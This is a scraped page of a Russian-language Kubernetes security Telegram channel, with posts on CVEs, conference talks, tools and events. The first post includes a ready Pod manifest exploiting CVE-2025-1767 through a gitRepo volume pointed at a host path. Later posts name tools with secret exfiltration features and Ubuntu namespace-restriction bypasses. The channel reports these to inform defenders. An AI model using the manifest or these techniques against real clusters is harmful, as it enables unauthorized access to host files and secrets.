Telegram Web
Возвращаясь к CVE-2025-1767, о которой мы рассказывали в прошлую пятницу, нельзя не упомянуть о довольно простой эксплуатации этой баги:

apiVersion: v1
kind: Pod
metadata:
name: git-repo-pod-test
spec:
containers:
- name: git-repo-test-container
image: raesene/alpine-containertools
volumeMounts:
- name: git-volume
mountPath: /tmp
volumes:
- name: git-volume
gitRepo:
repository: "/TestingScripts"
directory: "."


Про это подробно Rory McCune рассказал в свой статье CVE-2025-1767 - Another gitrepo issue.

Кстати говоря, после выхода CVE-2025-1767 активизировались обсуждения насчет выпиливания gitRepo Volume как фичи с версии Kubernetes 1.33 по умолчанию. И как итог, в рамках KEP-5040, gitRepo Volume driver был удален. Более подробно обсуждения можно почитать тут и тут.

Этот кейс еще раз показывает важность использования Policy Engine механизмов.
👍122🔥2
Вернемся к непопулярной у нас теме (но при этом достаточной интересной) - Windows containers и поможет нам в этом статья "How do COWs (Containers on Windows) work?" с хорошей визуализацией и сравнением с Linux containers.

При этом отдельно хочется отметить что аналогичный runc компонент в Windows под названием hcsshim (Host Compute Service Shim) доступен в исходниках и изучить его можно тут.
🔥13🙈52
Сегодня вернемся к атакующей тематике, а именно – Mark Manning представил крутейший доклад Command and KubeCTL: Kubernetes Security for Pentesters and Defenders на прошедшей вчера конференции B-Sides Reykjavik 2025.

В докладе он рассмотрел Real World Scenario – начиная с компрометации среды сборки и заканчивая эксфильтрацией секретов в продакшн кластере Kubernetes.

Также нельзя упомянуть о модификациях некоторых ранее известных инструментов, которые автор сделал специально для доклада:

1) В go-pillage-registries добавлен bruteforce имен образов для выкачивания их из regsitry, а также добавлена интеграция с trufflehog для поиска чувствительных данных внутри образов.
2) В backdoored-vault (форк Vault) добавлена DNS эксфильтрация секретов

Со слайдами можно ознакомиться тут.
👍13🔥8🥰1
Конкурс!

7 и 8 апреля в Москве пройдет DevOpsConf 2025! Там как всегда будем много интересного по теме контейнеров, Kubernetes и безопасности этих технологий.

Мы разыгрываем:
- 1 офлайн билет
- 2 онлайн билета

И так, Kubernetes очень активно развивается и с каждой новой версией там появляется все больше новых возможностей! Это легко можно увидеть, на пример, в проекте Kaniuse, который является Kubernetes Feature Status Tracker.

Для того чтобы выиграть один из призов в комментариях к данному посту напиши какую вы фичу ждете и почему, описав конкретную вашу боль. Эта фича как уже может иметь какой-то KEP, так и полностью придумана вами. Чем подробнее вы опишите тем больше шансов выиграть.

Варианты принимаем до 27 марта.

P.S. Наша команда будет на конференции и мы с радостью пообщаемся в офлайн.

P.S.S. Промокод на скидку в 5% при покупке билета dc25_k8security ;)
👍9🔥5
Grant - инструмент (от создателей Syft и Grype) для работы с лицензиями для образов контейнеров, SBOM, файловых систем и применения правил для построения отчетов соответствия лицензионным политикам/требованиям.

Пример правила:
pattern: "*gpl*"
name: "deny-gpl"
mode: "deny"
reason: "GPL licenses are not allowed"
exceptions:
- "alpine-base-layout" # We don't link against this package so we don't care about its license
🔥14👍41
Сегодня нашему каналу k8s (in)security исполняется 5 лет !!!

Мы всей нашей командой Luntry стараемся держать уровень и радовать вас новыми интересными материалами и мыслями про безопасность контейнеров и Kubernetes!

Не так давно мы пересекли рубеж в 10 000 подписчиков и продолжаем уверенно расти благодаря вам и формировать отличное сообщество. Вместе с вами в этом году мы уже проведем 3 специализированную конференцию БеКон!

Будем рады если поздравите нас в комментариях и/или поделитесь ссылкой на наш канал с друзьями, что интересуются данной темой.

P.S. А для меня это всегда двойной праздник, так как День рождение и у моего сынишки, который на 1 год младше данного канала)
1🎉98👍30❤‍🔥146🥰3🔥1
На нашем сайте в разделе Исследований стали доступны слайды и видеозапись выступления "Форензика для контейнеров и контейнерных инфраструктур" c CyberCamp 2025.

И если вам эта тема интересна и близка, то напоминаем что уже завтра 25 марта в 11:00 состоятся вебинар "Безопасность контейнеров и Kubernetes для SOC". Зарегистрироваться можно тут.
👍5🔥4
В Kubernetes раскрыта очередная уязвимость – CVE-2024-7598: Network restriction bypass via race condition during namespace termination.

Наверняка вы замечали, что некоторые ресурсы могут висеть в статусе terminated при удалении namespace целиком. Так вот порядок удаления ресурсов при таком namespace termination не определен, и это может привести к тому, что в какой-то момент времени Pods будут всё ещё работать, а Network Policy уже не будет существовать и применяться к Pods. Такое удаление ресурсов вызывает состояние гонки, которое в свою очередь даёт возможность обойти сетевые ограничения, наложенные Network Policy.

Аналогично совсем недавно раскрытой CVE-2025-1767 исправлений для текущих версий нет. Однако, очередность удаления ресурсов уже реализована в рамках KEP 5080 и будет завезена в статусе alpha в 1.33.

В качестве мер митигации предлагается вручную удалять Workloads перед удалением Namespace. Также предлагается использовать Network Policy Finalizer.

Уязвимость затрагивает Kubernetes кластера >= v1.3 версии и имеет оценку Low (3.1) по CVSS.
👍15🔥53
Исследователи из WIZ плотно взялись за ресерч очередного продукта, на этот раз – ingress-nginx controller. В результате было раскрыто 5 уязвимостей, одна из которых имеет severity critical.

Что интересно, в отличии от прошлых CVE, что находили в контроллере, для эксплуатации этих уязвимостей (не всех) не нужно создавать ресурс Ingress. Атакующему необходимо отправлять вредносные запросы через admission review напрямую в admission controller.

Максимальный импакт может нанести атакующий, находящийся внутри сети Kubernetes. И тут на помощь в очередной раз приходит Network Policy! Не устаем напоминать насколько это must have механизм.

Несмотря на то, что исследователи довольно подробно описали технические детали для эксплуатации уязвимостей реального эксполйта они не опубликовали. Однако PoC уже доступны на GitHub.

Забавно, что для уязвимости с максимальной критичностью 9.8 по CVSS для фикса просто закомментировали уязвимый функционал:

/* Deactivated to mitigate CVE-2025-1974
// TODO: Implement sandboxing so this test can be done safely
👍15🔥10😁53🌚1
Сегодня наша команда Luntry в рамках конференции Deckhouse Conf 2025 представит доклад "Стандарт безопасности контейнеров NIST 800-190 в 2025 году".

В процессе подготовки выступления были проанализированы документы NIST серии SP 800, связанные так или иначе с микросервисами, контейнерами, облаками и Cloud Native технологиями в общем.

В прикрепленной картинке вы можете наблюдать их перечень и при желании уже ознакомиться самостоятельно ;)
👍19🔥72
Сегодня хотим поделиться с вами очередным инструментом – Pinniped.

По сути, Pinniped выступает в роли authentication service для Kubernetes кластера. Он поддерживает различные authenticator types и OIDC identity providers, а также имплементирует различные стратегии интеграции с различными дистрибутивами Kubernetes для облегчения аутентификации.
👍14🔥2
Наши друзья из Флант сделали картинку k8s security iceberg про механизмы безопасности в Kubernetes и их уровни: от более простых к более сложным. Тоесть с чего по их мнению обычно начинают и к чему можно прийти в увлекательном пути обеспечения безопасности.

На первый взгляд может показать, что подобное сделать легко, но это не так. В своих подходах к подобному у меня получалось или все очень просто - всего лишь несколько пунктов на каждом уровне или каждый пункт разбивался еще на 5-10 подпунктов. В общем детализация сильно усложняет подобное... На пример, можно просто написать security feature gates и admission controllers, или перечислить конкретные.

А как насчет взять и сделать совместную редакцию K8s(in)security community edition данного айсберга?) Давайте в комментариях к данному посту попробуем расширить/поправить/улучшить/... данную версию. Считаем что уровни айсберга идут сверху вниз от 1 до 8.
1👍39🔥81
Парочку объявлений:

1) CFP БеКон 2025

Сегодня последний день принятия заявок! Далее мы примерно неделю их обработаем и даем ответ с обратной связью. И будем постепенно публиковать программу. До 10 апреля можно успеть купить билет по ранней цене.

2) Итоги конкурса от DevOpsConf 2025

Победители:
- @malibuup (offline билет)
- @atai_19 (online билет)
- @uburro (online билет)

Поздравляем победителей! И напоминаем про промокод на скидку в 5% при покупке билета dc25_k8security.
50🔥123
С 30 по 31 марта в Лондоне, в предверии KubeCon Europe 2025, прошла конференция Cloud Natvie Rejekts Europe 2025. Для тех кто не знает, напомним – на этой конференции спикеры это те люди, которых не взяли в основную программу KubeCon.

Securing AI/ML Workflows: Optimizing Container Images in Kubernetes Environments – доклад, который не остался незамеченным. В нём, Wojciech Kocjan, рассказывает как готовить тонкие образы для AI / ML нужд – минимизируя ненужные зависимости, выбирая безопасные базовых образы, и оптимизируя время сборки.

Доклад доступен в записи трансляции.
👍14🔥3🥰1
В официальном блоге Kubernetes вышла статья "Kubernetes v1.33 sneak peek", посвященная предстоящему релизу новой версии. С точки зрения безопасности этот релиз примечателен тем, что в нем наконец-то спустя 9 лет до GA доберётся KEP-127: Support User Namespaces in pods! И это прям очень круто для безопасности контейнеров в Kubernetes - можно сказать настоящая веха и понятия root пользователя будет делиться на до этого момента и после этого момента) Почему именно так? Можно ознакомиться в прошлогоднем докладе с нашей конференции БеКон под названием "Linux user namespace в чертогах Kubernetes".
🔥12👍42🥰1
Подготовка к нашей конференции БеКон 2025 идет полным ходом: программа формируются, партнеры подписываются, первый мерч готовится, стикерпак печатается!

До 3 июня уже не так-то и много времени осталось и возможность взять билеты по самой низкой цене ;)

P.S. Билетов ограниченное количество, все с учетом размеров площадки, чтобы всем было комфортно.
🔥112🥰1
Сегодня еще один пост про Linux user namespace ;)

Но уже про баги, точнее про обход механизма безопасности, который придумали и внедрили разработчики Ubuntu в свою ОС (в других ОС такой механизм вообще отсутствует). Оригинальный материал в заметке от исследователей называется "Three bypasses of Ubuntu's unprivileged user namespace restrictions" и описывает 3 способа обхода механизма sysctl kernel.apparmor_restrict_unprivileged_userns, через:
1) aa-exec
2) busybox
3) LD_PRELOAD

Если кратко, то задача данного механизма в том чтобы когда непривилегированный пользователь создавал unprivileged user namespace в нем не содержалось опасных административных capabilities (типа CAP_SYS_ADMIN или CAP_NET_ADMIN), которые чрезвычайно увеличивают поверхность атаки на ядро ОС.

Получение таких привилегий может в дальнейшем использоваться для ядерных эксплойтов, например чтобы сбежать из контейнера. О таком мы уже рассказывали тут.
👍14🔥41
Недавно прошел KubeCon + CloudNativeCon Europe 2025 и видео еще не доступны, но есть уже слайды по некоторым докладам.

Хочется отметить доклад "Enhancing Software Composition Analysis Resilience Against Container Image Obfuscation", который продолжает тему сокрытия уязвимостей в образах контейнеров. Мы писали об этом тут, тут и тут. Но на этот раз ребят подошли тут к вопросу с академической точки зрения и со всеми соответствующими атрибутами этого. И у них получилось отлично дополнить картину прошлых работ. Также они выложили репозитарий с кодом "Container obfuscation benchmark", чтобы можно было повторить их эксперимент.

В очередной раз хочется сказать, что стройте ZeroTrust защиту, а не вокруг управления уязвимостями - они были, есть и будут (их еще и спрячут от вас).

P.S. Ближайшие 2 дня наша команда на DevOpsConf 2025 - будем рады пообщаться лично!
🔥11👍32
2025/07/12 16:09:11
Back to Top
HTML Embed Code: